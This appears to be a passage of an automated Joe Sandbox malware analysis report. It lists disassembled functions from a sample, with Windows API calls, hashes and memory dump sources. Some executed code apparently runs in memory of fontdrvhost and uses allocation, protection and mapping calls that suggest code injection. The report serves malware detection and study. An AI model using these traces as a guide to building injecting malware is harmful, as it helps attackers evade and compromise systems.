                                                                                                                                                                                                                                                                    • Opcode ID: 6201b34415790ecdc3c4312f4d7271bec7e3576b96991d2cb71848aa7408f576
                                                                                                                                                                                                                                                                    • Instruction ID: cab6b8252c7ea6f46c49d82a6c8e4df40f83147f90a4d45c9da3e1dc65de2ae0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6201b34415790ecdc3c4312f4d7271bec7e3576b96991d2cb71848aa7408f576
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A41DD728001499FCB10DF59C880AAEB7B5FB94324F24426ED905633A0EB38AD41CB9A
                                                                                                                                                                                                                                                                    Function 00404306 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 72COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 0041FA30: WaitForSingleObject.KERNEL32(00000008,000000FF,00000000,00000008,00405984,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB10
                                                                                                                                                                                                                                                                      • Part of subcall function 0041FA30: CloseHandle.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB19
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004044EC
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandle$ObjectSingleWait
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in DestroyEvent $OOBEEvents$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 2079671238-3942007460
                                                                                                                                                                                                                                                                    • Opcode ID: 4e7abf2cf1a66fdbb446cba8b09f4a72dc1d6461a6f6d23e6cde9c9ed48dca8b
                                                                                                                                                                                                                                                                    • Instruction ID: aac3e4b64ef8bd33976eafc0c19c8d66d4ba662bde6bb840a130360140da2fc7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e7abf2cf1a66fdbb446cba8b09f4a72dc1d6461a6f6d23e6cde9c9ed48dca8b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87212670B843109BCB20DF148C4675A3B58AF51B11F1404BFE9466B2C1DEBCA905C7AE
                                                                                                                                                                                                                                                                    Function 00404050 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(00000000,00000000,00000008,?,?,004059AA), ref: 0040405B
                                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(00497733,?,?,004059AA), ref: 00404065
                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000,?,?,004059AA), ref: 004040F5
                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32(?,?,004059AA,?,?,?,?,?,?,?,?,?,?,?,?,00000028), ref: 00404103
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalDeleteSection$InitializeUninitialize
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 161803370-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1374b990ee36924d85f733176f9cff0057eba2b114e7e0308ad5df1b95475ba0
                                                                                                                                                                                                                                                                    • Instruction ID: 8dbd2ad74c855c1e3886fba8a0bf51dabcff8673f71024995de98868baa7c6da
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1374b990ee36924d85f733176f9cff0057eba2b114e7e0308ad5df1b95475ba0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF11B2B16001416BD704EBA6DC49B59B7A8FF90319F10013AF309C7A90DBB9F964C7AA
                                                                                                                                                                                                                                                                    Function 0270DE91 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0270DEAD
                                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0270DEC6
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000003.2765700918.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_3_26e0000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Value___vcrt_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1426506684-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4ee3819c82200233a02d2690cbc952527884f9f81e5f8f058464aa55a89b9ba0
                                                                                                                                                                                                                                                                    • Instruction ID: c4de3f3de4c9917dacb5574c4fa2b2f57b74ac922a3e1d74d3eeae569bd84040
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ee3819c82200233a02d2690cbc952527884f9f81e5f8f058464aa55a89b9ba0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4019732648322EEA73632F47CC966A3BE5EF02274B204739E524800D0EF601C1E9B80
                                                                                                                                                                                                                                                                    Function 0046A3FC Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0046A40E
                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0046A41D
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0046A426
                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 0046A433
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                    • Opcode ID: ac1283240fa4666ab2caaaff0c877bff52670fbfcb2ac06dcdcff882bb556bcf
                                                                                                                                                                                                                                                                    • Instruction ID: e4e9c80c65a6a08ef3cfff89654f3def58ef4d81fe7765c738179de465d37d3f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac1283240fa4666ab2caaaff0c877bff52670fbfcb2ac06dcdcff882bb556bcf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50F05F71C10209EBCB04DBB5DA49A9EBBF8EF28305F5148A69412E7150E774AB049F55
                                                                                                                                                                                                                                                                    Function 0041FE90 Relevance: 5.4, APIs: 4, Instructions: 417COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?), ref: 0041FF5B
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 0041FF65
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8d4374fadd7b43dced5683e9704e2794f3d6c2d318b486cb43d93fc2591642e0
                                                                                                                                                                                                                                                                    • Instruction ID: bd9ddbb0fe4a3e6c369a6c316b03fe687d8d5a0e13e3211eb2381caa863402dd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d4374fadd7b43dced5683e9704e2794f3d6c2d318b486cb43d93fc2591642e0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BAF19B72A00218AFCF00DF98D880AAEBBF5FF48310F54456AF945A7352D735AD45CBA9
                                                                                                                                                                                                                                                                    Function 0046A7CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00402170: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,0040320B,?,?,?,?,\\.\pipe\,00000009,?,?), ref: 00402175
                                                                                                                                                                                                                                                                      • Part of subcall function 00402170: GetLastError.KERNEL32(?,00000000,00000000,?,0040320B,?,?,?,?,\\.\pipe\,00000009,?,?), ref: 0040217F
                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,0040120A), ref: 0046A7FE
                                                                                                                                                                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040120A), ref: 0046A80D
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0046A808
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                                                                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                    • API String ID: 3511171328-631824599
                                                                                                                                                                                                                                                                    • Opcode ID: 00762af9e337a6805c8ac2cb9da72729d3ba67172526ae018d23e5fce0be16ff
                                                                                                                                                                                                                                                                    • Instruction ID: 855bd9d759665368c18885314bfe8a93a87ca15081f3247de167772f86f515d8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00762af9e337a6805c8ac2cb9da72729d3ba67172526ae018d23e5fce0be16ff
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24E06D742007118BD3B0AF65E408B46BAE4AB15704F00887FE481E3681EBB8E8448FAA

                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                    Function 030E02D8 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 169memoryfileCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 030E0326
                                                                                                                                                                                                                                                                      • Part of subcall function 030E00A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 030E00CD
                                                                                                                                                                                                                                                                      • Part of subcall function 030E00A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 030E0279
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 030E0378
                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 030E03E7
                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 030E0407
                                                                                                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 030E042E
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 030E0456
                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 030E0471
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000022.00000003.2765907315.00000000030E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_34_3_30e0000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
                                                                                                                                                                                                                                                                    • String ID: ,
                                                                                                                                                                                                                                                                    • API String ID: 3867569247-3772416878
                                                                                                                                                                                                                                                                    • Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                                                                                                                                    • Instruction ID: f4340ebc5eeffc552f0a4b4321d5d34ad12a672ce0c0918180d947d0b1a1190d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D612DB6A01209EFDB20DFA5C984ADEFBF9FF48350F14841AE959A7640D770A940CB60
                                                                                                                                                                                                                                                                    Function 030E00A4 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 030E00CD
                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 030E0279
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000022.00000003.2765907315.00000000030E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_34_3_30e0000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2087232378-0
                                                                                                                                                                                                                                                                    • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                                    • Instruction ID: cecdc3f91c3d257d1ef81f84b7c142175ae9e0bc2069eca97cc078966a170a1b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5719A71E0524ADFDB41CF99C881BEDBBF0AF09315F284499E4A5FB241C274AA91CF64

                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                    Execution Coverage:33.4%
                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                    Signature Coverage:83.3%
                                                                                                                                                                                                                                                                    Total number of Nodes:24
                                                                                                                                                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                                                                                                                                                    execution_graph 415 11370011cf4 417 11370011d19 415->417 416 11370011fa1 417->416 426 113700115c0 417->426 419 11370011f98 CloseHandle 419->416 420 11370011f88 NtAcceptConnectPort 420->419 421 11370011e3a 421->419 421->420 422 11370011ecd 421->422 429 11370010ac8 421->429 422->422 435 11370011aa4 NtAcceptConnectPort 422->435 427 113700115f4 NtAcceptConnectPort 426->427 427->421 430 11370010c62 429->430 431 11370010ae8 429->431 430->422 431->430 432 11370010be8 NtAcceptConnectPort 431->432 432->430 433 11370010c1b 432->433 433->430 434 11370010c33 NtAcceptConnectPort 433->434 434->430 436 11370011af7 435->436 437 11370011c04 435->437 441 11370011870 436->441 437->420 439 11370011b10 440 11370011bb6 NtAcceptConnectPort 439->440 440->437 443 11370011889 441->443 442 11370011949 442->439 443->442 444 11370011930 GetProcessMitigationPolicy 443->444 444->442

                                                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                    Function 0000011370011CF4 Relevance: 3.3, APIs: 2, Instructions: 278nativeCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000027.00000002.2972140329.0000011370010000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000011370010000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_39_2_11370010000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AcceptCloseConnectHandlePort
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3811980168-0
                                                                                                                                                                                                                                                                    • Opcode ID: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                                                                                                                                                    • Instruction ID: 8e337ef98c4c63e4446359b0cce491a1c688ec8ba17ab6312912b931af34afc0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B910974508E088FDB6DDF1CD4417E9B3E1FB89320F14465EE59BC32DADA74A9428B81
                                                                                                                                                                                                                                                                    Function 0000011370010AC8 Relevance: 3.2, APIs: 2, Instructions: 185nativeCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000027.00000002.2972140329.0000011370010000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000011370010000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_39_2_11370010000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                    • Opcode ID: 275693e7d66e5d53f7e2184dfa7c88ce453f9d9d0d3e8ba4525500231a394657
                                                                                                                                                                                                                                                                    • Instruction ID: 4a92bb4b79bc4d5db4d93371f61a8ddce9fb138a792ef1922a4d2c7b80188261
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 275693e7d66e5d53f7e2184dfa7c88ce453f9d9d0d3e8ba4525500231a394657
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D514438918A240AE32DA738C8D52FCB7D1F782319F34025ED2F3C51D7EA65C6468B82
                                                                                                                                                                                                                                                                    Function 0000011370011AA4 Relevance: 3.2, APIs: 2, Instructions: 150nativeCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000027.00000002.2972140329.0000011370010000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000011370010000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_39_2_11370010000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AcceptConnectPort$MitigationPolicyProcess
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2923266908-0
